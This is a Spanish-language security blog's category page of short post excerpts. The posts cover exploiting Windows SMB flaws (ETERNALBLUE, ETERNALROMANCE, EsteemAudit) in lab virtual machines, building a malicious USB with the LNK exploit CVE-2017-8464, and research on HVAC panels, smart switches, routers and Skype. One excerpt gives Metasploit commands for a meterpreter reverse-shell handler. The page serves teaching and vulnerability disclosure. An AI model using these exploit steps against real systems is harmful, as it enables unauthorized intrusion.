Archivo de la categoría: Vulnerabilidades

Explotando ETERNALROMANCE ETERNALSINERGY en Windows Server 2016

El exploit se encuentra en la popular base de datos de exploits: exploit-db. Es necesario agregar una cuenta valida de cualquier nivel de permisos y el nombre de un PIPE. 1. Abrir firefox en la siguiente liga: https://gist.github.com/hkm/ 2. Click … Sigue leyendo

Share
Publicado en Videos, Vulnerabilidades | Deja un comentario

Creando un USB malicioso con Microsoft Windows LNK Exploit: CVE-2017-8464

1. En Metasploit crea un HANDLER para recibir la conexión: msf 》 use exploit/multi/handler msf exploit(handler) 》 set payload windows/x64/meterpreter/reverse_tcp msf exploit(handler) 》 set LHOST TUDIRECCIÓNIP msf exploit(handler) 》 run 2. Ahora utiliza el exploit cve_2017_8464_lnk_rce para crear los archivos: … Sigue leyendo

Share
Publicado en Videos, Vulnerabilidades | Deja un comentario

Detectando y Explotando ETERNALBLUE en Windows 7 x64 con NMAP y Metasploit

Esta práctica consiste en utilizar el exploit ya incluido en Metasploit para comprometer un Windows 7 de 64 bits. 1. Identifica en que rango está la máquina virtual desde Kali: root@kali:~# ifconfig eth0 (el rango debe verse similar a 192.168.179.XXX) … Sigue leyendo

Share
Publicado en Videos, Vulnerabilidades | Deja un comentario

Explotando EsteemAudit en Windows 2003 x86 con EsteemAudit-2.1.0.exe desde Metasploit

La práctica consiste en explotar un Windows 2003 x86 con los exploits filtrados de la NSA desde Metasploit. La práctica incluye la instalación del ejecutable original de EsteemAudit-2.1.0.exe. 1. Identifica en que rango esta la máquina virtual desde Kali: root@kali:~# … Sigue leyendo

Share
Publicado en Videos, Vulnerabilidades | Deja un comentario

Scripts para obtener información de Trane Trace SC HVAC

Par de scripts para obtener información y explotar vulnerabilidades en Trane Tracer SC, un panel inteligente utilizado para comunicación con controladores de equipo HVAC. http-vuln-cve2016-0870.nse Download: https://github.com/hkm/nmap-nse-scripts/blob/master/http-vuln-cve2016-0870.nse Existe información sensible expuesta en la versión 4.20.1134 y anteriores en URLs como /evox/user/user/ … Sigue leyendo

Share
Publicado en Exploits, Scripts Nmap, Software, Vulnerabilidades | Deja un comentario

Scripts de NMap para Belkin Wemo Smart Switch

El Belkin WeMo Switch es un contacto eléctrico que puede ser controlado desde la red local. La versión actual del firmware (WeMo_WW_2.00.10966.PVT-OWRT-SNS) no requiere autenticación para prender o apagar el contacto eléctrico o para obtener información de las redes inalámbricas cercanas.   … Sigue leyendo

Share
Publicado en Exploits, Investigaciones, Scripts Nmap, Software, Videos, Vulnerabilidades | Deja un comentario

Explotación masiva de vulnerabilidades en ruteadores

Ver disapositivas Los métodos para escanear redes han evolucionado, y podemos encontrar millones de dispositivos de interconexión vulnerables que ponen en riesgo la información de sus propietarios y facilitan ataques a mayor escala. Mostraremos las técnicas que actualmente se utilizan … Sigue leyendo

Share
Publicado en Campus Party, Congresos, Investigaciones, Presentaciones, Videos, Vulnerabilidades | Deja un comentario

Descarga el Detector de Puertas Traseras v2.0

En este blog hemos hablado mucho acerca de las puertas traseras que contienen los principales dispositivos de interconexión en México. Hemos desarrollado una herramienta que permite fácilmente detectar si tu modem o router son vulnerables. El Detector de Puertas Traseras … Sigue leyendo

Share
Publicado en Contraseñas, Investigaciones, Software, Vulnerabilidades | Deja un comentario

Obtener la dirección IP de un usuario de Skype

Es posible obtener la dirección IP de un usuario de Skype con solamente el nombre de usuario. Si el usuario se encuentrá desconectado es posible obtener la última dirección desde la cual se conectó. La vulnerabilidad se encuentra en el … Sigue leyendo

Share
Publicado en Investigaciones, Vulnerabilidades | Deja un comentario

Evasión de bloqueo de protector de pantalla con RSS Saver

Como saben es recomendable habilitar el bloqueo automático de las computadoras. Esto se logra poniendo un timeout en el protector de pantalla. Desafortunadamente los protectores de pantalla mal programados pueden poner en riesgo tu computadora al permitir la evasión de … Sigue leyendo

Share
Publicado en Software, Vulnerabilidades | 1 comentario